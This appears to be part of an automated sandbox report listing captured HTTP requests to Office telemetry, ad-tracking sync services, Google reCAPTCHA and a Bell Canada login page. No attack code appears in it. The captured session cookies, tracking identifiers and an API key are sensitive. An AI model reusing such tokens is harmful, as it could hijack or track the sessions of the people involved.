Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ibs:dpid=903&dpuuid=d5095770-96af-43e0-8b13-9a680ab5a9e6 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184
Source: global trafficHTTP traffic detected: GET /ibs:dpid=771&dpuuid=CAESEBplPp3DJvzinu148tIAFz8&google_cver=1?gdpr=0&gdpr_consent= HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0 HTTP/1.1Host: app.linkConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=ZyOCLgAAAGAnoQN6 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP&co=aHR0cHM6Ly9teWJlbGwuYmVsbC5jYTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=h2gb06tnckv8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bg/b50FiC3GJqhOPkFyj4HYcajJNbVzXJ6nVw0XfMkHZ-k.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP&co=aHR0cHM6Ly9teWJlbGwuYmVsbC5jYTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=h2gb06tnckv8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /utsync.ashx?eid=50112&et=0&gdpr=0&gdpr_consent=&return=https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D22052%26dpuuid%3D[PersonID] HTTP/1.1Host: ml314.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ibs:dpid=903&dpuuid=d5095770-96af-43e0-8b13-9a680ab5a9e6 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920
Source: global trafficHTTP traffic detected: GET /ibs:dpid=771&dpuuid=CAESEBplPp3DJvzinu148tIAFz8&google_cver=1?gdpr=0&gdpr_consent= HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ibs:dpid=1957&dpuuid=3C32A0BCB9AE6F030E85B595B85F6EBE HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ibs:dpid=22052&dpuuid=3648095275875565600 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926
Source: global trafficHTTP traffic detected: GET /cms?partner_id=ADOBE&_hosted_id=26594250982175076714259318767746782479&gdpr=0&gdpr_consent= HTTP/1.1Host: cms.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /p?c1=9&c2=6034944&c3=2&cs_xi=26594250982175076714259318767746782479&rn=1730380329900&r=https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D73426%26dpuuid%3D26594250982175076714259318767746782479 HTTP/1.1Host: ads.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v1/open HTTP/1.1Host: api2.branch.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/bg/b50FiC3GJqhOPkFyj4HYcajJNbVzXJ6nVw0XfMkHZ-k.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/webworker.js?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /map/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=26594250982175076714259318767746782479?https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D121998%26dpuuid%3D${profile_id} HTTP/1.1Host: sync.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /match?bid=6j5b2cv&uid=26594250982175076714259318767746782479&r=https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D30064%26dpuuid%3D%7BUUID_6j5b2cv%7D HTTP/1.1Host: ps.eyeota.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Web/MYB/custom/css/eChat/eChat-Light.min.css HTTP/1.1Host: mybell.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mybell.bell.ca/Login?language=enAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtSa=-; DAPROPS="sdevicePixelRatio:1|bjs.deviceOrientation:0|sdeviceAspectRatio:1280/1024|sjs.webGlRenderer:ANGLE (Google, Vulkan 1.3.0 (SwiftShader Device (Subzero) (0x0000C0DE)), SwiftShader driver)|sscreenWidthHeight:1280/1024|srendererRef:02166304444|saudioRef:781311942|sversion:1.9.1|bE:0"; __cwaf=true; ASP.NET_SessionId=xekfkxdqg0g3hnhhj5c40x2j; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; at_check=true; TLP409c8162028=08e8c5f15aab200053aa5ccfe5e832db45475ef295985a3d4fc15b396b763391ffb89da57ba1b6090837cb0aaa11300089b08d2df57e2fd010033ec317cfbfcf62fe15bed26fbe78c923dda43bf22d36fef085c13810cee06027e5f1b2e39512; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; mbox=session#e8acc2285415480dbbf54ad6f854a96e#1730382191|PC#e8acc2285415480dbbf54ad6f854a96e.37_0#1793625131; AKA_A2=A; zone=zone=&city=Killeen&pcd=&isp=&ispconnectiontype=; TLP020a4695=028702b9c9c05a52921ccf3c31971699d213c39112484a31e547d2c2ffd38687ed59a36d0
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ibs:dpid=1957&dpuuid=3C32A0BCB9AE6F030E85B595B85F6EBE HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /ibs:dpid=22052&dpuuid=3648095275875565600 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dpm=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930|30064-1-1730380334922|30646-1-1730380336184|73426-1-1730380336920|121998-1-1730380337926|139200-1-1730380339124
Source: global trafficHTTP traffic detected: GET /p2?c1=9&c2=6034944&c3=2&cs_xi=26594250982175076714259318767746782479&rn=1730380329900&r=https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D73426%26dpuuid%3D26594250982175076714259318767746782479 HTTP/1.1Host: ads.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=1123d546211b0baea46fc051730380340; XID=1123d546211b0baea46fc051730380340
Source: global trafficHTTP traffic detected: GET /map/ct=y/c=9828/tp=ADBE/gdpr=0/gdpr_consent=/tpid=26594250982175076714259318767746782479?https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D121998%26dpuuid%3D${profile_id} HTTP/1.1Host: sync.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cc_cc=ctst
